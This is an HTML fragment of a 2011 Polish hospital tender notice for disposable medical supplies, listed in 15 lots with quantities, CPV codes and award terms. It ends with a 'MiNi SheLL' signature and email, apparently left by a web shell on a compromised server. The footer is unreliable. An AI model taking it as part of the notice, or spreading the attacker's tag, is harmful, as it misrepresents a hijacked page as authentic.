a/ zgłoszenie do Prezesa Urzędu Rejestracji Wyrobów Medycznych potwierdzające, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679), aktualny certyfikat zgodności wyrobu z wymaganiami zasadniczymi.<br>
b/ foldery, katalogi/ prospekty oferowanego przedmiotu zamówieniu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.<br>
2. W przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie stanowiła zmiany umowy i nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera, ul. Św. Józefa 53/59, 87- 100 Toruń - pokój Nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Okulary jednorazowe ochronne do fototerapii, wykonane z ultramiękkiego materiału, dla obwodu głowy 20-38cm, mikrobiologicznie czyste - 250 szt.<br>
2 Czujnik jednorazowy, sterylny, nie zawierający lateksu, dla niemowląt od 3kg do 20kg, w kształcie litery L. Sensor w technologii OxiMax, kalibrowany cyfrowo i analogowo - 550 szt.<br>
3 Czujnik jednorazowy, sterylny, nie zawierający lateksu, dla noworodków poniżej 3kg lub dla dorosłych powyżej 40kg, w kształcie litery L. Sensor w technologii OxiMax, kalibrowany cyfrowo i analogowo, rejestrujący historię zdarzeń - 650 szt.<br>
4 Czujnik saturacji SpO2 jednorazowy, klejony, dla noworodków poniżej 3kg, mikrobiologicznie czysty - 500 szt.<br>
5 Czujnik saturacji SpO2 jednorazowy, klejony, neonatologiczny, mikrobiologicznie czysty kompatybilny z pulsoksymetrem typu DN-2261-6 Novametrix	 - 200 szt.<br>
6 Jednorazowy układ oddechowy do nCPAP z podgrzewanym ramieniem wdechowym, z workiem oddechowym i złączką typu Y, mikrobiologicznie czysty, wraz z jednorazowym zestawem do samoczynnego napełnienia komory nawilżacza
kompatybilny z nawilżaczem Fisher & Paykel - 25 kpl.<br>
7 Dren tlenowy ze złączem standardowym, długość ok. 1,8m - 250 szt.<br>
8 Łącznik do drenów i ssaków, mikrobiologicznie czysty - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Wielokomorowy zestaw do drenażu opłucnej, z mechaniczną regulacją siły ssania - 23 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Aparat do przetoczeń płynów infuzyjnych kompatybilny z pompą infuzyjną INFUSOMAT SPACE standard - 850 szt.<br>
2 Aparat do przetoczeń krwi i preparatów krwiopochodnych, z filtrem do krwi 200?m kompatybilny z pompą infuzyjną INFUSOMAT FMS transfusion - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Filtr oddechowy dla dorosłych, sterylny, filtracja mechaniczna bakteryjno- wirusowa, filtr klasy HEPA13, objętość przestrzeni martwej około 80ml, złącze proste - 1600 szt.<br>
2 Filtr oddechowy pediatryczny, sterylny, filtracja mechaniczna lub elektrostatyczna bakteryjno-wirusowa, filtr klasy HEPA13, objętość przestrzeni martwej w zakresie 20-35ml, złącze proste - 2150 szt.<br>
3 Filtr oddechowy noworodkowy, sterylny, filtracja mechaniczna lub elektrostatyczna, objętość przestrzeni martwej około 10ml, złącze kolankowe	 -1000 szt.<br>
4 Wymiennik ciepła i wilgoci, sterylny, do rurek tracheotomijnych z portem tlenowym z nawilżaniem dopływającego tlenu, z samodomykającym się portem do odsysania pomiędzy dwiema membranami wymiennika, objętość przestrzeni martwej około 10ml, skuteczność nawilżania 29,2mg H2O przy Vt 500ml, waga 6,3g - 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Filtr oddechowy do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, z hydrofobową, mechaniczną warstwą filtrującą w kształcie harmonijki, wydajność nawilżenia min. 32 mg/litr przy Vt 500ml, objętość martwa do 66ml, skuteczność filtracji 99,999%, waga filtra do 36 gram, powierzchnia filtracji 190cm, utrata wilgoci 6mg H2O/l przy objętości oddechowej 500ml	 - 500 szt.<br>
2 Filtr oddechowy dla dzieci do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, elektrostatyczna warstwa filtrująca, wydajność nawilżenia min. 31mg/litr przy Vt 250ml, objętość martwa do 29ml, skuteczność filtracji 99,99%, waga filtra do 21 gram, zakres pojemności oddechowej 75-300ml, port kapno - 500 szt.<br>
3 Filtr oddechowy dla dorosłych, do długiej wentylacji, sterylny, z wyraźnie wydzielonym celulozowym wymiennikiem ciepła i wilgoci, elektrostatyczna warstwa filtrująca, wydajność nawilżenia min. 33mg/litr przy Vt 500ml, opory przepływu 2,7cm H2O przy 60l/min, objętość martwa do 51ml, skuteczność filtracji 99,999%, waga filtra do 28 gram, zakres pojemności oddechowej 150-1200ml, port kapno - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Wkłucie centralne jednoświatłowe<br>
Rozmiar:<br>
24G x 100-120mm - 20 szt.<br>
22G x 100mm - 20 szt.<br>
20G x 100-120mm - 20 szt.<br>
2 Wkłucie centralne dwuświatłowe<br>
Rozmiar:<br>
3,0F x 80-120mm - 20 szt.<br>
4,0F x 100mm - 20 szt.<br>
4,0F x 130mm - 20 szt.<br>
5,0F x 80mm - 20 szt.<br>
5,0F x 130mm - 20 szt.<br>
5,5F x 160mm - 20 szt.<br>
7,0F x 200mm - 20 szt.<br>
3Wkłucie centralne trójświatłowe<br>
Rozmiar:<br>
4,0F x 130mm - 20 szt.<br>
5,5F x 160mm - 20 szt.<br>
7,0F x 160mm - 20 szt.<br>
4 Zamek do wkłuć centralnych, zamykające światło odprowadzeń cewnika centralnego - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Igła do znieczuleń podpajęczynówkowych z końcówką pencil-point, z prowadnicą, z przezroczystą końcówką typu lock, kolorowe oznaczenie rozmiaru mandrynu<br>
Rozmiar:<br>
25G x 90mm - 500 szt.<br>
26G x 90mm - 500 szt.<br>
27G x 90mm - 500 szt.<br>
25G x 110mm - 50 szt.<br>
2 Igła do znieczuleń zewnątrzoponowych typu TOUCHY, z mandrynem, z przezroczystą końcówką typu lock, kolorowe oznaczenie rozmiaru mandrynu<br>
Rozmiar:<br>
18G x 110mm - 50 szt.<br>
20G x 80mm - 50 szt.<br>
3 Igła do znieczuleń splotów nerwowych, z drenem do podawania leków, z połączeniem elektrycznym do stymulatora<br>
Rozmiar:<br>
22G x 50mm - 50 szt.<br>
24G x 25mm - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Miękki rozwidlacz trójkanałowy. Każdy kanał o dł. 10cm, śr. zewn. 2,5mm, wewn. 1,5mm, samoopróżniający się, z zaciskiem, zakończony zamkniętym systemem bezigłowym z łatwą do dezynfekcji membraną (bez silikonu) zamykającą się w sposób automatyczny na 7 dni i min. 360 użyć - 1200 szt.<br>
2 Kranik trójdrożny neonatologiczny, ze zmiennym oznaczeniem kolorystycznym (czerwono- niebieskim), z systemem antyzapiekowym na jednym odprowadzeniu, z możliwością obrotu o 360°, bezpieczny dla neonatologii -1800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie Nr 9..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Rurka intubacyjna z mankietem niskociśnieniowym, z PCV, z otworem Murphyego, z balonikiem kontrolnym w kolorze różnym od transparentnego przewodu łączącego z rurką<br>
Rozmiar: od 3,0 do 9,0 - 1400 szt.<br>
2 Rurka intubacyjna bez mankietu, z PCV, z otworem Murphyego<br>
Rozmiar: od 3,0 do 9,0 - 950 szt.<br>
3 Rurka intubacyjna zbrojona z mankietem uszczelniającym<br>
Rozmiar: od 5,0 do 8,0 - 300 szt.<br>
4 Rurka intubacyjna zbrojona bez mankietu<br>
Rozmiar: od 4,0 do 8,0 - 300 szt.<br>
5 Prowadnica do rurek intubacyjnych<br>
Rozmiar: od 10,0 do 12,0 - 500 szt.<br>
6 Rurka intubacyjna dwukanałowa, bez balonu, do podawania surfaktantu lub monitorowania ciśnienia w drogach oddechowych, przezroczysta, z kontrastującym w rtg paskiem, z 25mm końcówką dystalną kontrastującą w rtg, oznakowanie długości co 0,5cm<br>
Rozmiar: od 2,0 do 5,0 - 90	szt.<br>
7 Rurka ustno-gardłowa Guedela, kodowana kolorystycznie, sterylna - 500 szt.<br>
Rozmiar:<br> 
00/40mm<br>
0/50 mm<br>
1/60 mm<br>		
8 Rurka tracheotomijna z mankietem uszczelniającym<br>
Rozmiar: od 2,5 do 9,0 - 150 szt.<br>
9 Rurka tracheotomijna bez mankietu<br>
Rozmiar: od 2,5 do 9,0 - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie Nr 10..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Cewnik centralny zakładany metodą Seldingera, kontrastujący w rtg, poliuretanowy, z integralnym drenem przedłużającym, z zestawem wprowadzającym (prosta prowadnica, igła wprowadzająca)<br>
Rozmiar: 2Fr x 80 mm - 100 szt.<br>
2 Cewnik centralny zakładany metodą Seldingera, kontrastujący w rtg, poliuretanowy, z integralnym mocowaniem, z zestawem wprowadzającym (prosta prowadnica, igła wprowadzająca) -10 szt.<br>
Rozmiar:<br> 
3 Fr x 80 mm<br>
3 Fr x 120 mm<br>		
3 Cewnik pępkowy, dwukanałowy, poliuretanow - 120 szt.<br>
Rozmiar:<br> 
4 Fr x 200 mm<br>
(2 x 20G).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie Nr 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Jednorazowy układ drenów do respiratora, noworodkowy, podgrzewany, posiadający system uniwersalnych łączników umożliwiających zastosowanie we wszystkich typach respiratorów kompatybilny z nawilżaczami Fisher & Paykel - 120 szt.<br>
2 Jednorazowa komora do nawilżacza kompatybilna z nawilżaczami Fisher & Paykel - 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie Nr 12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Port bezigłowy do bezpiecznego dożylnego podawania płynów i leków, możliwość stosowania przez 7 dni, bez mechanicznych części wewnętrznych, posiadający prosty i widoczny tor przepływu, z zastawką w postaci jednoelementowej, silikonowej, podzielnej membrany, osadzonej na plastikowym, przezroczystym konektorze, o min. przepływie 525ml/min, zgodnym z wymaganiami normy PN-EN ISO 10555-5 - 800 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie Nr 13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Czujnik temperatury do inkubatorów Babytherm - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie Nr 14..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Zestaw do szynowania moczowodów z cewnikiem typu double-j wykonanym z poliuretanu, do stosowania do 3 miesięcy, skalowany co 1cm. Popychacz prosty ok. 45cm, prowadnica ok. 100cm pokryta PTFE, klamra, cewnik zamknięty od strony nerki, perforowany na całej długości. Długości do wyboru: 12cm, 15cm, 18cm, 20cm, 22cm, 24cm, 28cm.<br> 
Rozmiar:<br>
4CH - 5 szt.<br>
4,7CH - 5 szt.<br>
2 Zestaw do szynowania moczowodów, z cewnikiem typu double-j, do stosowania do 6 miesięcy, z popychaczem łączącym się z cewnikiem i dającym możliwość manewru nawet po wyjęciu prowadnicy. Cewnik zamknięty od strony nerkowej. Długości do wyboru: 15cm, 20cm, 22cm, 24cm, 26cm, 30cm.<br>
Rozmiar:<br>
4CH - 25 szt.<br>
4,8CH - 25 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie Nr 15..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Zestaw do nefrostomii 2-stopniowej, z cewnikiem pokrytym hydrożelem, z twardą prowadnicą typu Lunderquist i igłą widoczną w USG i RTG, z poprzecznymi rowkami do przyszycia<br>
Rozmiar:<br>
6CH - 5 szt.<br>
8CH - 5 szt.<br>
10CH - 5 szt.<br>
2 Zestaw do nefrostomii 1-stopniowej (jednego nakłucia) z cewnikiem skalowanym co 1cm, z silikonowym elementem do mocowania do skóry pacjenta. Cewnik na igle<br>
Rozmiar:<br>
8CH - 5 szt.<br>
10CH - 5 szt.<br>
3 Zestaw do cystostomii cystofix. W zestawie: rozrywalna igła 120mm lub 80mm, skalpel, plaster, cewnik typu pigtail, w zestawach dziecięcych bezpieczna igła o długości 70mm - 30 szt.<br> 
Rozmiar:<br>
5CH<br>
8CH<br>
10CH<br>
12CH.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com